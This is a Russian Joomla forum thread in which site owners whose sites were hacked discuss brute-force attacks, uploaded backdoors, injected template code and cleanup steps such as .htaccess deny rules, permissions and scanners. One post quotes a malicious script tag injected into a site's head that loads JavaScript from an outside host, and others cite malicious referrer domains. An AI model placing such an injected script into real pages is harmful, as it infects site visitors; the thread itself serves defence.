Новости Joomla

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы

WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы

👩‍💻 WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы.Пакет плагинов, обеспечивающий ручную и автоматическую отправку url адресов Joomla в поисковые системы на переиндексацию по протоколу IndexNow. Согласно документации протокол поддерживают все крупнейшие поисковые системы, кроме Google. Протокол служит для получения от сайтов URL, которые нужно переиндексировать заново или проиндексировать в первый раз как можно быстрее. Отправка адресов сайта таким образом существенно ускорит индексацию нового или изменённого контента поисковыми системами.Поисковые системы по этому протоколу обмениваются друг с другом данными, поэтому отправив URL в одну из них вы сообщаете их сразу всем. Протокол IndexNow поддерживают:- Amazon- Microsoft Bing- Naver- Seznam.cz- Yandex - YepСуточный лимит URL - 10000 в сутки. Возможна отправка вручную и автоматически. Поддерживаются:- материалы и категории материалов Joomla- контакты и категории контактов Joomla- SW JProjects - компонент каталога расширений для Joomla- JoomShopping - компонент интернет-магазина для Joomla- Phoca Download - компонент каталога файлоа для Joomla- Phoca Cart - компонент интернет-магазина для Joomla- RadicalMart - компонент интернет-магазина для JoomlaПакет плагинов работает с Joomla 4.3+. Тестировался на Joomla 5 и Joomla 6.Смотреть видео:- ВК Видео- RuTubeСсылки:Страница расширенияGitHub расширенияРаздел Поддержка протокола IndexNow в справке Яндекса@joomlafeed#joomla #seo #indexnow

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 292275 Просмотров
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
не снижает нагрузку на сервак? Честно говоря по фигу) думаю с хоста за это не попрут)
нет( у меня простой хост((
Ограничение доступа то есть у меня..тока там тупо просят ввести путь и всё)  а как оно работает и что делает? Просто никого не пускает что ли? И я так понимаю что лучше баннить в ISP их всех а не на каждом сайте?
картинок нет) и не было вроде как...
ещё вот смотрю и вижу такое в error log, это просто то что юзер пришёл с Яндекса и всё?
Спойлер
[свернуть]
« Последнее редактирование: 12.10.2013, 17:26:52 от stardel »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Ограничение доступа то есть у меня..тока там тупо просят ввести путь и всё)  а как оно работает и что делает? Просто никого не пускает что ли?
Эта настройка создает http-авторизацию for /administrator
А что на вирт.хосте доступно iptables ?
« Последнее редактирование: 12.10.2013, 18:13:48 от draff »
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
draff а смысл делать  http-авторизацию  ? сайт из за этого недоступен всем(
кстати есть вопрос: куда писать чтобы сняли с сайта ограничение что он не доступен и на нём вирус? Вроде год назад писал в Яндекс-суппорт...но точно не помню...
« Последнее редактирование: 12.10.2013, 19:02:52 от stardel »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
draff а смысл делать  http-авторизацию  ? сайт из за этого недоступен всем(
кстати есть вопрос: куда писать чтобы сняли с сайта ограничение что он не доступен и на нём вирус? Вроде год назад писал в Яндекс-суппорт...но точно не помню...
Я думал мы обсуждаем защиту от брутфорс. И пост свой подправил.
Очистишь, а потом Платону.
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
то есть задавать ограничение доступа  например так?  /www/moisait.ru/administrator   что то он ругается( пишет что такой путь уже есть...чего ему надо? Щукину написал из панели Вебмастера)
*

siao

  • Захожу иногда
  • 233
  • 4 / 0
Здравствуйте!

скажите, на сайт мне сейчас идет атака на administrator/index.php
20тыс запросов за сутки, сообщает мне хостер

скажите, хостер вообще как-то должен это дело пресекать? защищать пользователей своих или нет?
вот они мне советуют - поставьте этот плагин - http://extensions.joomla.org/extensions/access-a-security/site-security/login-protection/8386
в его описании сказано, что он умеет блокировать бэкенд юзеров, которые пытаются войти в панель управления неверно набирая пароль энное кол-во раз.
и что? что мне толку от такого плагина, поток запросов не уменьшится же

и потом мне интересно, а как хостер увидел, что запросы идут именно к администратору? когда в лог файлах я вижу бесконечный поток GET к 404 странице и POST к компоненту komento. один IP и такая пара - GET-POST (404-komento), и таких IP много.

еще нашла на сайте два архива admin и doc, которые раскрылись в images и еще куда-то не помню уже, удалила
а в папке cache все время появляется папка fof, удалить невозможно -((
пароль к ftp поменяла, к БД тоже.

что же делать?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
.htaccess  в папку /administrator
Код
Order Deny,Allow
Deny from all
Временно. Но лучше таки
Цитировать
http-авторизацию for /administrator
И чистить сайт.
*

siao

  • Захожу иногда
  • 233
  • 4 / 0

а в папке cache все время появляется папка fof, удалить невозможно -((


оказалось это что-то от akeeba (у меня стоит akeebasubs на сайте) и у них оказывается есть такой фреймворк.
https://github.com/akeeba/fof
и в админке компонента есть такая папка с одним файлом include.php

удивляет то, что в кеше fof в этом файле содержится список всех таблицБД и другая информация, права у него хотя бы 664

атака, шедшая три дня, сошла на нет.
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
оказалось это что-то от akeeba (у меня стоит akeebasubs на сайте) и у них оказывается есть такой фреймворк.
https://github.com/akeeba/fof
удивляет то, что в кеше fof в этом файле содержится список всех таблицБД и другая информация, права у него хотя бы 664
а что ценного в списке таблиц?))))
нууу, ребята!
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

siao

  • Захожу иногда
  • 233
  • 4 / 0
а что ценного в списке таблиц?))))
нууу, ребята!

казалось бы да - зачем? -) (но я не программист, я даже предположить не могу -) но после сноса данного компонента, перестала в кеше появлятся и эта папка.

зато вот после удаления каталога images/doc на сайте пошли ошибки -
 [Mon Oct 21 09:50:23 2013] [error] [client 64.122.169.98] File does not exist: /home/***.ru/images/doc, referer: http://bataco.net/shop/mypage/google/index.htm

и этот реферер просто офигевает и заваливает теперь меня ошибками, обращаясь к этому удаленному каталогу.
касперский на этот адрес не пускает.
и еще вот этот http://sritvnews.lk/google.zipgrt/index.htm

*

siao

  • Захожу иногда
  • 233
  • 4 / 0
у меня в связи с произошедшим вопрос такой

что это собственно было? -)))
1) два архивных файла admin.zip и doc.zip появились в директории моего домена без моей помощи (как залили?)
2) они были распакованы в images/doc
3) на сайт три дня валились с разных IP десятки тысяч запросов, которые в логах показывались как GET к 404 странице и POST к странице компонента комментариев. и так с одного IP шла пара запросов - GET-POST, GET-POST
сайт естесственно то совсем падал, то очень медленно работал.

хостер мне сказал, что в логах у него (а почему у меня таких нет и я этого не вижу?) он видит, что идет атака на папку /administrator

и вопрос - зачем атаковать папку администратор, если ты уже сумел залить на сайт два файла и их там даже распаковать?
что это было, Берримор?


upd.
а хорошо оказывается проверять таким образом - скачивать себе на комп свой сайт filezillой, а касперский при этом проверяет ведь...
вот и выловил мне бэкдор троянскую программу с этим bataco.net
написала в хостинг этого сайта, какие козлы у них размещаются (японцы какие-то)
« Последнее редактирование: 21.10.2013, 13:26:13 от siao »
*

stardel

  • Завсегдатай
  • 1943
  • 22 / 0
Обнаружил в корне аккаунта на ftp файлик странный ....называется .codepage содержимое простое: ANSI_X3.4-1968 вроде всё безобидно) но раньше его там не было...что это?  просто кодировка? или ещё что то?
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
Всем привет))) Прошу помощи у знающих...с периодичностью в 1-2 дня какая то "нехороший человек" вставляет "левый код" в индексный файл шаблона сайта, код такой:
Спойлер
[свернуть]
Код вставляется в одно и тоже место шаблона, после строк:
<h1 id="name-text" class="art-Logo-name"><a href="<?php echo $baseUrl; ?>

Движок 1.5.26, вроде как все обновил (компоненты, модули, плагины), пароли менял ни один раз, админка закрыта доп.авторизацией, по ftp стоит ограничение по доступу.
Не могу понять откуда ноги растут((( Буду признателен за любой совет или помощь)))
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Опять же остался или шелл или еще какой-то вид доступа. Тут cURL советовали отключать, но это не выход. Надо искать проблему.
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
Опять же остался или шелл или еще какой-то вид доступа. Тут cURL советовали отключать, но это не выход. Надо искать проблему.
Угу, как раз найти то и не получается, логи каждый раз при возникновении изучаю, не нахожу чтоб было обращение к индексному файлу шаблона, всех, кто ломятся в админку присекаю на корню в .htaccess, равно как и тех кто сделать "POST" хочет в неразрешенных местах, прошел демкой сканера ssf.php, нашел 2 подозрительных "картинки" в компоненте баннеров (это было 25-го числа), убил их, вздохнул, что видимо нашел и давно они там оказывается "висели", а тут сегодня опять тоже самое в индексе шаблона, каких либо новых файлов не нашел на хостинге у себя((((
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
не все нашли файлы проверяются вручную и глазами автоматического нет и не будет потратьте время на просмотр всех файлов на которые показывает сканер и найдете еще что либо
чистка это не просто иногда на сайт уходит по 8-10часов непрерывной работы у хорошо знающих что искать, а успокоится найдя один два файла не стоит, их сейчас не один десяток пихают а то и не одну сотню

забыл как всегда написать проверьте еще если существуют и оседании сайты, так же очень тщательно ;)
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Да, с некоторыми несколько дней сидеть приходится.
*

alinz

  • Новичок
  • 6
  • 0 / 0
Проблема с некоторыми сайтами на хостинг аккаунте. Первый сайт Joomla 2.5.14, второй - форум рнрвв, и там и там время от времени появляется одна и таже проблема, перед закрывающимся тегом head, прописывается строчка вируса
Код
<script type="text/javascript" src="//rdomn1383054303.hopto.me/jquery.js?1383054403"></script></head>
, урлы бывают разные, после очистки устаревшего кеша на Joomla и кеша на форуме строчка пропадает, но потом через время появляется опять. На хостинге есть еще сайты на Joomla 1.5, Wordpress, никаких проблем на них не наблюдается. Скачивал сайт на локалку, проверял антивирусами - ничего, перекодировал URL вируса в base64, искал по файлам - не нашел ничего. Закачал айболит, нашел он кучу подозрительных файлов и сигнатур. Кто может помочь с очисткой и настройкой сайтов на защиту от вирусов ?
*

novoross

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
а в каких div-ах сидит этот код? разве нельзя по дивам хоть примерно определить от куда ссылка генерируется?
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
По возможности, если много сайтов, лучше брать vps и разносить по разным аккаунтам.
*

alinz

  • Новичок
  • 6
  • 0 / 0
По возможности, если много сайтов, лучше брать vps и разносить по разным аккаунтам. - так и сделано, у нас впс, на моем акаунте мои сайты, но, на других акк. на сервере также были попадались вирусы, кстати в одно и тоже время начали появляться

а в каких div-ах сидит этот код? разве нельзя по дивам хоть примерно определить от куда ссылка генерируется? - не могу, кусок кода привел, больше ничего там невидно, если бы в боди был, та так в голове страницы.
*

novoross

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
*

alinz

  • Новичок
  • 6
  • 0 / 0
Если создавал тему на серче, то наверно читал ), но если не знаеш за что отвечает кусок кода, то пытаться удалить и ждать пару дней пока вирус опять не появится на сайте и убедиться что это не оно, как то неправильно.
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
забыл как всегда написать проверьте еще если существуют и оседании сайты, так же очень тщательно ;)
В эту фразу не совсем понял, буду рад пояснениям)))
P.S. получается, мне нужно выкачать сайт себе локально, на хостинге сканером пройтись - и что он (сканер) найдет, проверять вручную...
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Проблема с некоторыми сайтами на хостинг аккаунте. Первый сайт Joomla 2.5.14, второй - форум рнрвв, и там и там время от времени появляется одна и таже проблема, перед закрывающимся тегом head, прописывается строчка вируса
Код
<script type="text/javascript" src="//rdomn1383054303.hopto.me/jquery.js?1383054403"></script></head>
, урлы бывают разные, после очистки устаревшего кеша на Joomla и кеша на форуме строчка пропадает, Кто может помочь с очисткой и настройкой сайтов на защиту от вирусов ?
Начни с самого простого- наведи порядок с пользователями.Отключи регистрацию юзеров и проверь права у имеющихся юзеров.
 Проверь модули, в папке /modules
И на время отключи cURL и права установи на папки 500, на файлы 400. Предварительно очисти кеш в /cache
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
@ua4frr
если вы все сделаете автоматически то вам орден положен
Цитировать
что он (сканер) найдет, проверять вручную...
да
можно сканировать на хосте закрыв сайт от общего доступа что многие не делают, это правило любой чистки
нет ни одного сканера в общем доступе для авто очистки сайта, можно найти из массы места где может быть "зараза" можно зная что именно автоматически удалить из всех файлов или подменить на что то свое

но нет и не будет ни когда авто очистки сайта нажатием одной кнопки (если сами разработчики не внесут такое решение в CMS и не будет сторонних расширений) и чистка сайта и устранение уязвимости, это только ручная работа которую делают видя глазами и чистя руками, каждый сайт это индивидуальный проект, каждый взлом отличается, даже массовые взломы периодически меняют алгоритм и файлы и коды

посмотрите сколько тем поднимается в интернете, что "почистил и опять", и посмотрите на даты этих сообщений, многие сами не зная что делать мучаются по полгода

все сервисы и сканеры делают просто облегчение работы (они указывают на места где может быть причина на которую надо посмотреть и понять она ли это, и что бы посмотреть не надо иметь навыки того же программирования надо просто аналитически мыслить) и каждый из них делает это по своему и пользователь в праве выбирать то что ему проще и подходит именно для него
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
flyingspook, спасибо за разъяснение, буду пробовать, как раз нужных знаний то и не хватает к сожаленнию((( в плане программирования, но раньше так и действовал, как вы и пишете - т.е. анализируя все глазами, сравнивая размеры файлов и даты их изменения, сравнивая структуру папок в корне сайта, наличие "левых" файлов и прочее, в общем то удалось победить зимой этого года всякие заражения сайта, чем был не сказанно рад, а тут опять вылезло, как бы вреда не приносит, что самое нитересное, т.е. ни Яндекс ни Google не сообщают мне что есть заражение (поисковые машины тоже все четко выдают мне без редиректов), и при обращении к сайту антивирусы тоже молчат, часть  левого кода отображается поверх логотипа сайта, т.е. его строка как бы наложена на изображение, только по этому сразу начинаю искать, точнее уже давно знаю где эта строка, чтобы удалить ее - а вот найти черный вход пока не получается, поэтому здесь и попросил помощи...есть еще у меня подозрение что хостинг дырявый, на котром сайт расположен...
*

alinz

  • Новичок
  • 6
  • 0 / 0
Начни с самого простого- наведи порядок с пользователями.Отключи регистрацию юзеров и проверь права у имеющихся юзеров.
 Проверь модули, в папке /modules
И на время отключи cURL и права установи на папки 500, на файлы 400. Предварительно очисти кеш в /cache

Уже начал работать в этом направлении, удаляю все лишнее, права отключу на все, что можна. Пока вирус появляется пару раз на день, чищу кеш и ищу причины.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
есть еще у меня подозрение что хостинг дырявый, на котром сайт расположен...
не исключается очень много сайтов переносили с таких хостов, тут еще может если у вас же есть соседний ваш же сайт то и на нем быть уязвимость но его не станут за рожать да бы не светить а соседний с хорошими показателями или просто, будут, надо смотреть что установлено и что не успели обновить своевременно, или если обновляли после зимы то может уже было поздно, и не исключено что зимой тоже не дочистили, сами иногда промахиваемся в работе не секрет, но нам зная что искать проще потом если что случается поправить, но "ошибки" бывают не скрываю просто потом приходится еще раз если что то происходит все просматривать, это издержки чистки, тут борьба своего рода между "спрятавшимся" и тем кто ищет
*

ua4frr

  • Новичок
  • 6
  • 0 / 0
flyingspook, я могу вам в ЛС написать, каким хостингом пользуемся - я так думаю у вас опыта общения с ними больше чем у меня, т.е. вы сможете сказать "косячный" хостинг или нет или какое среднее мнение, хостинг мне достался как бы в наследство от конторы, который мы заказывали сделать сайт для нас, потом контора тихо "померла" и пришлось уже самому разбираться, Joomla ставили и затачивали под себя уже самостоятельно, сайт всего один у нас, на своем домене...
Сегодня утром полез по ftp еще раз глазами пройтись - первым делом в шаблоны, индексный файл опять с измененной датой от вчерашнего числа, хотя я ни чего не менял, открыл его - косяков вроде нет, НО структура файла не понравилась - Notepad++ видит его в формате Мака почему то, много свободных строк, размер отличается, НО лишнего кода нет, все строки сверил с копией, перезалил его на хостинг с копией...сайт работает штатно, поисковики выдают нужные результаты...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2517
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71435
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3496
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5114
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3522
Последний ответ 22.02.2022, 11:38:15
от AlexP750